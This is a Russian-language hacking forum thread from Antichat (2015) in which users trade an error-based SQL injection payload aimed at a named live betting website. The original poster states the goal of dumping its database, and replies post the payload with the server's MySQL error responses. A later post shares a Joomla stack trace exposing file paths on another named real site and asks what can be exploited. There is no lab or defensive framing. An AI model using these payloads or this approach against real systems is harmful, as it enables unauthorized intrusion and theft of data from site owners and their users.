ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.12.2015, 16:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
3146
Репутация:
0
|
|
Сообщение от vivona
vivona said:
↑
не тянет не хавидж не sqlmap вот такую вот скулю
Код:
Code:
http://www.sosbettingtips.com/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1
как раскрутить sqlmapom или еще чем нить это божетво. руками все норм, нужно слить базу но незнаю как кроме sqlmap или хавидж
|
|
|
|
26.12.2015, 16:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
14367
Репутация:
0
|
|
Сообщение от vivona
vivona said:
↑
Ставь Live http headers на мозилу и крути я через burp suite работаю, мне интересно что это за уязвимость и как ее дальше крутить? как обычную sql?
Получаю вот такой ответ.
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND print_status=0 AND print_redirect='' GROUP BY app_deal.id ORDER BY print_st' at line 1
|
|
|
|
26.12.2015, 16:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
3146
Репутация:
0
|
|
Сообщение от PoliGroS
PoliGroS said:
↑
я через burp suite работаю, мне интересно что это за уязвимость и как ее дальше крутить? как обычную sql?
Получаю вот такой ответ.
|
|
|
|
26.12.2015, 16:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
3146
Репутация:
0
|
|
поробуй через error baze вывести имена таблиц вот таким запросом
Код:
Code:
'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1
|
|
|
|
26.12.2015, 19:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
14367
Репутация:
0
|
|
Сообщение от vivona
vivona said:
↑
поробуй через error baze вывести имена таблиц вот таким запросом
Код:
Code:
'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1
Сообщение от None
HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 26 Dec 2015 15:48:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 227
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND print_status=0 AND print_redirect='' GROUP BY app_deal.id ORDER BY print_st' at line 1
|
|
|
|
27.12.2015, 15:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
3146
Репутация:
0
|
|
Сообщение от vivona
vivona said:
↑
руками все норм, нужно слить базу но незнаю как кроме sqlmap или хавидж что некто не может раскрутить*?)
|
|
|
|
27.12.2015, 18:32
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от vivona
vivona said:
↑
что некто не может раскрутить*?) написать скрипт же
|
|
|
27.12.2015, 18:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
3146
Репутация:
0
|
|
Сообщение от yarbabin
yarbabin said:
↑
написать скрипт же Да вот найти бы умельца(сам в этом еще не соображаю
|
|
|
|
27.12.2015, 21:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
65956
Репутация:
0
|
|
jos-Warning: exception 'RuntimeException' with message 'Unknown column 'header' in 'field list' SQL=SELECT `new_url`,`header`,`published` FROM `j1_redirect_links` WHERE `old_url` = ' http://www.raa.ru/index.php?id=2011\'' LIMIT 0, 1' in /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver/mysqli.php:610 Stack trace: #0 /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver.php(1279): JDatabaseDriverMysqli->execute() #1 /home/w/wermark/raa.ru/public_html/plugins/system/redirect/redirect.php(86): JDatabaseDriver->loadObject() #2 [internal function]: PlgSystemRedirect::handleError(Object(JException)) #3 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(760): call_user_func(Array, Object(JException)) #4 [internal function]: JError::handleCallback(Object(JException), Array) #5 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(218): call_user_func_array(Array, Array) #6 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(179): JError::throwError(Object(JException)) #7 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(254): JError::raise(1, 404, '???????????????...', NULL, true) #8 /home/w/wermark/raa.ru/public_html/components/com_content/models/article.php(163): JError::raiseError(404, '???????????????...') #9 /home/w/wermark/raa.ru/public_html/libraries/legacy/view/legacy.php(401): ContentModelArticle->getItem() #10 /home/w/wermark/raa.ru/public_html/components/com_content/views/article/view.html.php(42): JViewLegacy->get('Item') #11 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(690): ContentViewArticle->display() #12 /home/w/wermark/raa.ru/public_html/components/com_content/controller.php(104): JControllerLegacy->display(true, Array) #13 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(728): ContentController->display() #14 /home/w/wermark/raa.ru/public_html/components/com_content/content.php(38): JControllerLegacy->execute(NULL) #15 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(392): require_once('/home/w/wermark...') #16 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(372): JComponentHelper::executeComponent('/home/w/wermark...') #17 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(191): JComponentHelper::renderComponent('com_content') #18 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(230): JApplicationSite->dispatch() #19 /home/w/wermark/raa.ru/public_html/libraries/cms/application/cms.php(252): JApplicationSite->doExecute() #20 /home/w/wermark/raa.ru/public_html/index.php(48): JApplicationCms->execute() #21 {main}
Что можно хорошего получить от этой ошибки?
|
|
|
|
28.12.2015, 00:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
3146
Репутация:
0
|
|
Сообщение от .Light.
.Light. said:
↑
jos-Warning
: exception 'RuntimeException' with message 'Unknown column 'header' in 'field list' SQL=SELECT `new_url`,`header`,`published` FROM `j1_redirect_links` WHERE `old_url` = '
http://www.raa.ru/index.php?id=2011\
'' LIMIT 0, 1' in /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver/mysqli.php:610 Stack trace: #0 /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver.php(1279): JDatabaseDriverMysqli->execute() #1 /home/w/wermark/raa.ru/public_html/plugins/system/redirect/redirect.php(86): JDatabaseDriver->loadObject() #2 [internal function]: PlgSystemRedirect::handleError(Object(JException)) #3 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(760): call_user_func(Array, Object(JException)) #4 [internal function]: JError::handleCallback(Object(JException), Array) #5 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(218): call_user_func_array(Array, Array) #6 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(179): JError::throwError(Object(JException)) #7 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(254): JError::raise(1, 404, '???????????????...', NULL, true) #8 /home/w/wermark/raa.ru/public_html/components/com_content/models/article.php(163): JError::raiseError(404, '???????????????...') #9 /home/w/wermark/raa.ru/public_html/libraries/legacy/view/legacy.php(401): ContentModelArticle->getItem() #10 /home/w/wermark/raa.ru/public_html/components/com_content/views/article/view.html.php(42): JViewLegacy->get('Item') #11 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(690): ContentViewArticle->display() #12 /home/w/wermark/raa.ru/public_html/components/com_content/controller.php(104): JControllerLegacy->display(true, Array) #13 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(728): ContentController->display() #14 /home/w/wermark/raa.ru/public_html/components/com_content/content.php(38): JControllerLegacy->execute(NULL) #15 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(392): require_once('/home/w/wermark...') #16 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(372): JComponentHelper::executeComponent('/home/w/wermark...') #17 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(191): JComponentHelper::renderComponent('com_content') #18 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(230): JApplicationSite->dispatch() #19 /home/w/wermark/raa.ru/public_html/libraries/cms/application/cms.php(252): JApplicationSite->doExecute() #20 /home/w/wermark/raa.ru/public_html/index.php(48): JApplicationCms->execute() #21 {main}
Что можно хорошего получить от этой ошибки? раскрытие путей, не больше, скули тут нет
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
